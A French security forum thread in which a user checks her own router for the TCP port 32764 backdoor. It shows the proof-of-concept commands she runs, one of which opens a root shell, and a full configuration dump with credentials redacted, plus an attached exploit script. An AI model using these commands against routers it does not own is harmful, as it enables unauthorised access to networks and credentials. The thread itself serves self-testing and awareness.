Modem-routeurs Linksys,Netgear,Cisco 32764 backdoor

Questions autour de la sécurité en général.
Pour les désinfections, merci de vous rendre dans la partie Windows --> Virus : Aide Malwares
Avatar de l’utilisateur
angelique
Geek à longue barbe
Geek à longue barbe
Messages : 28869
Inscription : 28 févr. 2008 13:58
Localisation : Breizhilienne à l' 0u3st
Contact :

Modem-routeurs Linksys,Netgear,Cisco 32764 backdoor

Message par angelique » 31 déc. 2014 19:08

Qu'en est il de : http://www.ghacks.net/2014/01/06/find-r ... ort-32764/

root@debian:/home/angel/Documents/gnu/TCP-32764-master# python poc.py --ip 192.168.0.1
192.168.0.1:32764 is vulnerable!


j'ai mis des regles services et inbound block always 32764 , mais poc.py me dit tjrs 192.168.0.1:32764 is vulnerable!

root@debian:/home/angel# curl 192.168.0.1:32764
curl: (56) Recv failure: Connexion ré-initialisée par le correspondant << c'est bon ou pas ? lol
MMcS����


(56) Recv failure: Connexion ré-initialisée par le correspondant me fait die que c'est OK ?

ou c'est carrement dans le firmware du modem routeur ? sont tous backdoorés ..............


Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
http://angelik.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Ne soyez pas Rat!Je fais parti des millions de pauvres en France
Image
https://lilymarguerite.wixsite.com/lilymarguerite


Avatar de l’utilisateur
angelique
Geek à longue barbe
Geek à longue barbe
Messages : 28869
Inscription : 28 févr. 2008 13:58
Localisation : Breizhilienne à l' 0u3st
Contact :

Re: Les modem-routeurs 32764 backdoor

Message par angelique » 02 janv. 2015 11:34

ça craint cerrément du boudin pouarf!!!!!!! :D

angel@debian:~/Documents/gnu/TCP-32764-master$ python backdoorolol.py --ip 192.168.0.1 --port 32764 --shell
welcome, here is a root shell, have fun


angel@debian:~/Documents/gnu/TCP-32764-master$ python backdoorolol.py --ip 192.168.0.1 --port 32764 --print_conf
time_zone=GMT-1
time_daylight=1
restore_default=0
wiz_language=English
wiz_country=France
fix_ipaddr=
fix_netmask=
fix_gateway=
wan_ifname=ppp0
wan_mode=pppoa
wan_iptype=Dynamic
wan_ipaddr=
wan_netmask=
wan_gateway=
wan_mtu=1500
wan_fix_dns=1
wan_dns1=208.67.220.220
wan_dns2=208.67.222.222
wan_macaddr=
wan_encap=1
wan_vpi=8
wan_vci=35
wan_account=
wan_domain=
wan_dod=1
lan_if=br0
lan_ipaddr=192.168.0.1
lan_netmask=255.255.255.0
lan_bipaddr=192.168.0.255
dhcp_server_enable=1
dhcp_start_ip=192.168.0.2
dhcp_end_ip=192.168.0.254
dhcp_reserved=
http_username=admin
http_password=supprimé
http_timeout=5
rt_static_route=
rt_rip_version=1
rt_rip_direction=0
ddns_enable=0
ddns_service_provider=dyndns
ddns_user_name=
ddns_password=
ddns_host_name=
ddns_use_wildcards=0
pppoe_username=
pppoe_password=
pppoe_idle=0
pppoe_service=
pppoa_username=fti/supprimé
pppoa_password=supprimé
pppoa_idle=0
pppoa_ipaddr=
wifi_ssid=CISCO
wifi_region=Europe
wifi_channel=11
wifi_auth_type=3
wifi_key_len=128
wifi_def_key=1
wifi_key1=supprimé
wifi_key2=supprimé
wifi_key3=supprimé
wifi_key4=supprimé
wifi_access_control=0
wifi_access_list=
wifi_if_on=1
wifi_broadcast_ssid=1
wifi_wep_on=1
wifi_dot11_mode=0
wifi_dot11_iso=1
wifi_radius_port=1812
mail_enable=1
mail_logfull=0
mail_sendlog=2
mail_server=smtp.wanadoo.fr
mail_recipient=supprimé@wanadoo.fr
mail_dos=1
mail_portscan=1
mail_block=1
mail_sh_day=
mail_sh_hour=0
log_dos=1
log_block=1
log_login=1
log_gateway=1
log_type=0
log_remote_ip=
fw_disable=0
fw_nat=1
fw_block=0
fw_block_keyword=
fw_block_trust_enable=0
fw_block_trust=
fw_services_def=Any(ALL):any:1-65535
Any(TCP):tcp:1-65535
Any(UDP):udp:1-65535
AIM:tcp:5190-5190
BGP:tcp:179-179
BOOTP_CLIENT:udp:68-68
BOOTP_SERVER:udp:67-67
CU-SEEME:both:7648-24032
DNS:both:53-53
FINGER:tcp:79-79
FTP:tcp:20-21
H.323:tcp:1720-1720
HTTP:tcp:80-80
HTTPS:tcp:443-443
IDENT:tcp:113-113
IRC:both:6667-6667
NEWS:tcp:144-144
NFS:udp:2049-2049
NNTP:tcp:119-119
POP3:tcp:110-110
RCMD:tcp:512-512
REAL-AUDIO:tcp:7070-7070
REXEC:tcp:514-514
RLOGIN:tcp:513-513
RTELNET:tcp:107-107
RTSP:both:554-554
SFTP:tcp:115-115
SMTP:tcp:25-25
SNMP:both:161-161
SNMP-TRAPS:both:162-162
SQL-NET:tcp:1521-1521
SSH:both:22-22
STRMWORKS:udp:1558-1558
TACACS:udp:49-49
TELNET:tcp:23-23
TFTP:udp:69-69
VDOLIVE:tcp:7000-7000
VPN-IPSEC:udp:500-500
VPN-L2TP:udp:1701-1701
VPN-PPTP:tcp:1723-1723
fw_services=
fw_in_rules=
fw_out_rules=
fw_dmz_enable=0
fw_dmz=
fw_spi=1
fw_response_ping=0
fw_schedule=1111111:0:0-24:0
fw_time_zone=+1c
fw_remote=0
fw_remote_type=
fw_remote_range_start=
fw_remote_range_end=
fw_remote_single=
fw_remote_port=8080
fw_import=1
ntp_custom=0
ntp_server=
upnp_enable=0
upnp_adv_time=30
upnp_ttl=4
upnp_permission=enable
upnp_default=
upnp_custom=
snmp_enable=0
snmp_read_community=
snmp_sys_name=
snmp_sys_contact=
snmp_sys_location=
blank_state=0
ca_wsectype=wep
wifi_present=1
wifi_features=1
wiz_runtest=
ipoa_mode=
mail_enable_auth=1
mail_login=supprimé
mail_password=supprimé
pppoe_ipaddr=
ipoa_ipaddr=
ipoa_netmask=
ipoa_gateway=
wifi_psk_pwd=
wifi_radius_server=
wifi_radius_login_key=
wifi_wds=
wifi_wds_apmode=
wifi_wds_repeater1mac=
wifi_wds_repeater2mac=
wifi_wds_repeater3mac=
dis_sip_alg=
vpn=
Pièces jointes
backdoorolol.py.zip
(1.9 Kio) Téléchargé 41 fois
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
http://angelik.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Ne soyez pas Rat!Je fais parti des millions de pauvres en France
Image
https://lilymarguerite.wixsite.com/lilymarguerite

Crystal
newbie
newbie
Messages : 24
Inscription : 21 oct. 2012 16:47

Re: Les modem-routeurs 32764 backdoor

Message par Crystal » 02 janv. 2015 15:31


Avatar de l’utilisateur
angelique
Geek à longue barbe
Geek à longue barbe
Messages : 28869
Inscription : 28 févr. 2008 13:58
Localisation : Breizhilienne à l' 0u3st
Contact :

Re: Les modem-routeurs 32764 backdoor

Message par angelique » 02 janv. 2015 16:58

Le test n'est pas probant avec ce site, moi aussi c'est marqué Stealth lol

le POC le détermine >

angel@debian:~/Documents/gnu/TCP-32764-master$ python backdoorolol.py --ip 192.168.0.1 --port 32764
192.168.0.1:32764 is vulnerable!

EDIT: Le concept ne marche que sur un reseau local LAN_WAN mais ça reste dangeureux quand même si le materiel dessert un reseau wifi public ou une entreprise .
Avec Gnu_Linux t'as un Noyau ... avec Ѡindows t'as que les pépins
http://angelik.altervista.org/
Supprimer les "virus" gratuitement http://www.supprimer-trojan.com/
Ne soyez pas Rat!Je fais parti des millions de pauvres en France
Image
https://lilymarguerite.wixsite.com/lilymarguerite


Répondre

Revenir vers « Securite informatique »